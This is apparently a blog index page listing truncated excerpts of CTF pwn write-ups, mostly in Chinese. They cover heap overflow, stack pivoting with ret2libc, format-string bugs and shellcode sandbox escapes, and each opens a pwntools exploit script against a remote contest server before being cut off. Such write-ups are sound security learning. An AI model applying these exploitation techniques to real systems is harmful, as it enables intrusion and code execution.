133NSON's space

The vulnerability is in this part, we can bypass the if statement by integer overflow. Therefore, we are able to achieve out-of-bounds writing in the heap area. Step 1, leak the heap address. The vector of template class will allocate for twice the current memory size when the current memory is not enough. In the first two times, it will ask for 8 bytes and 16 bytes of memory from the heap allocator, which will return a chunk of size 0x20(In the following text, we refer to them as chunk a and c ...

摸了两道PWN就下号补作业去了（悲 converter2c32rtomb 函数若传入的的UTF-32字符非法会返回-1，利用这点可以使指针指向数组负下标的位置。往 utf32_hexstr[3] 的尾部写一组UTF-32字符的数据，使其解析 utf32_hexstr[3] 时解析多一组数据，在后续 printf 时就能将flag带出来 123456789101112131415161718192021222324252627282930#!/usr/bin/python2from pwn import *# io = process('./chall')io = remote('34.146.195.242', 40004)ru = lambda x : io.recvuntil(x, drop = True)sa = lambda a, b : io.sendafter(a, b)sla = lambda a, b : io.sendlineafter ...

总共5道PWN，上号的时候队里的师傅已经出了1道了，然后我把剩下的4道出了 Great Expectations读入浮点数部分写rbp，然后栈迁移+ret2libc 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364#!/usr/bin/python2from pwn import *context.binary = 'chall'libc = ELF('libc.so.6', checksec = False)sa = lambda a, b : io.sendafter(a, b)sla = lambda a, b : io.sendlineafter(a, b)ia = lambda : io.interactive()uu64 = lambd ...

index为200的页没有被mprotect调整权限，syscall指令被沙箱限制在这个页内执行，编写shellcode搜索出这个地址即可 因为是在不规则图（存在两条有向边指向同一个点的情况和环之类的）内搜索，直接进行 深搜/广搜 的效率会很低并且有可能会出现死循环（一直在一个环内的点循环搜索），所以在搜索过的页面上做个标记可以提高成功率，但比赛时懒得写了，直接广搜多跑几次也能通（ 还有就是最后在搜索出地址可以执行syscall后，直接执行 execve("/bin/sh", 0, 0) 会崩溃（猜测原因是程序内munmap掉了太多地址，本来合法的地址也变成了非法，sh进程里对这些munmap的非法地址进行了读写操作导致崩溃）。后面换成orw的shellcode就能正常读取flag了 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172#! ...

Move栈迁移+ret2libc 1234567891011121314151617181920212223242526272829303132333435363738394041#!/usr/bin/python2from pwn import *io = remote('123.56.25.124', 22278)context.binary = 'pwn'libc = ELF('libc.so.6', checksec = False)rc = lambda n : io.recv(n)sa = lambda a, b : io.sendafter(a, b)ia = lambda : io.interactive()uu64 = lambda x : u64(x.ljust(8, b'\x00'))pop_rdi = 0x0000000000401353got = ...

一开始直接忘了这个比赛，早上课上到一半看队友在说才想起来（ heap自己写的堆管理器，洞是堆溢出。小于0x80的堆块类似于cache可以用于劫持next指针实现任意地址分配，大于0x80的堆块在free之后堆头会写上elf段的地址可以用于泄露elf基址，最后利用可控的容易地址分配劫持malloc中里调用的函数指针为backdoor即可 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100#!/usr/bin/python2from pwn import *# io = process('./heap')io = remote('8.130.86.205', 20199)context.binary = 'hea ...

一开始想打dl的link_map，结果本地通了，远程调了半天。。。中间还以为是libc版本的问题用各种版本的libc都试了，还用他给的dockfile起了docker然后本地docker打通了结果远程还是不行。最后通过单字节的泄露发现远程和本地的libc除了got表上的数据其它好像都一样（被远程环境坑的最惨的一次，在一血出来前两个小时本地就通了，但就因为远程和本地libc的got表数据不一样把一血给玩没了…… 早知道一开始就老实打io_file了（ 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859#!/usr/bin/python2from pwn import *# io = process(['./lessequalmore', 'chal.txt'])io = remote('chal-lessequalmore.chal.hitconctf.com', ...

上去看的时候队里的其他师傅已经把PWN写的只剩一题了，然后就半摆烂地把PWN最后那道INJ写了，最后也是被队里的大佬们带飞拿了第一 题目的沙箱 利用shellcode切换至32位进行ORB，需要注意的是远程open返回的文件描述符可能不是3，需要用 mov ebx, eax 来设置read的fd 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081#!/usr/bin/python2from pwn import *context.binary = 'inj'sd = lambda x : io.send(x)sa = lambda a, b : io.sendafter(a, b)def pwn(ch): global io glob ...

赛后半小时出题，我是傻逼。 PWNlinkmap将got表上的指针写到bss段上，然后部分写 read 的函数指针为 write ，需要爆破一个16进制数位 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899#!/usr/bin/python2from pwn import *context.binary = 'ezzzz'elf = ELF('ezzzz', checksec = False)libc = ELF('libc.so.6', checksec = False)rc = lambda n : io.recv(n)sd = lambda x ...

AK了PWN，一个2血+一个3血 PWNfmt格串 12345678910111213141516171819202122232425262728293031323334353637383940#!/usr/bin/python2from pwn import *context.binary = 'fmt'libc = ELF('libc.so.6', checksec = False)io = remote('60.204.140.184', 30137)ru = lambda x : io.recvuntil(x, drop = True)sla = lambda a, b : io.sendlineafter(a, b)ia = lambda : io.interactive()uu64 = lambda x : u64(x.ljust(8, '\x00'))lib ...